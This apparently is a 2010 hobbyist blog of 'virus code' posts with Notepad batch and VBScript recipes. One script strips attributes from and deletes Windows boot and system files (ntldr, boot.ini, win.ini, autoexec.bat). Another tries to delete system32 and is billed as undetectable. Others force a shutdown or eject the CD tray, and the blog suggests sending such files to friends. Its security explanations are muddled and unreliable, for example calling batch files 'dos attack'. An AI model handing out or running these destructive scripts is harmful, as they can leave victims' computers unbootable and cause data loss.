Open the notepad type the following coding
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set oCD = oWMP.cdromCollection.getByDriveSpecifier("J:") ' or whatever
If vbOK = MsgBox ("Eject?", vbOKCancel) Then
oCD.Eject
If vbOK = MsgBox ("Close?", vbOKCancel) Then
oCD.Eject
End if
End if
And save it in to filename.vbs
Here we are learn something about hacking and create some virus codes here!!but this are only for the learning purposes.
Sunday, August 29, 2010
Tuesday, July 6, 2010
SHUTDOWN VIRUS
First open notepad and type like show below image
And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure
Enjoy!!
And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure
Enjoy!!
Sunday, July 4, 2010
DANGEROUS VIRUS CODE
In the post Show below virus coding is very dangerous, first open the notepad type code
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
save as in to virus.bat file system
VIRUS CODING CREATE IN NOTEPAD
write your own simple virus can’t detected by any antivirus....
@Echo off
Echo virus
Pause
@Echo off
Del C:\window\system32
Note : And save that as .bat file system format
it will delet c:... don’t try its only learning purpose
Friday, July 2, 2010
How to delete virus "autorun.bat"
How to detect virus in your pen drive are PC , First open the command prompt start-->run --> type cmd-->which drive to detect the virus identify it like example G:\> --> type attrib... command prompt virtual all file system and directory, In the drive search any autorun.bat
dos attack if any file system in drive type G:\>attrib -s -h -r autorun.bat and delete that virus G:\> del autorun.bat
Tuesday, June 29, 2010
How Generate the VIRUS
NOTE : Coding learning purpose only
first we see DOS attack,In his DOS attacks to create a fake virus,Its not very dangerous,its fun to send your friend,open the notepad and type start press enter similar type more than 5 times and type virus.bat....then save fake.bat file system enjoy
Monday, June 28, 2010
VIRUS
virus is unauthorised service in computer.virus can spread throughout via data or file system, its corrupt the database ,those virus are spread using some device and internet ,If u have updated antivirus u will secure your data and file ,type of attack
1.dos attack
2.exe attack
3.patch and crack attack
4.trojan attack etc.....
HACKING
Hacking is nothing but crack and control the system ..In the learn of hacking break the security and prevent the computer from virus and others ,data can be safe and securely,many activity of hacking..., to access computer networks, legally ..In institute to learn ethical hacking courses ...And to be a ethical hacker .its not vendor product ... ethical hacking ..
Subscribe to:
Posts (Atom)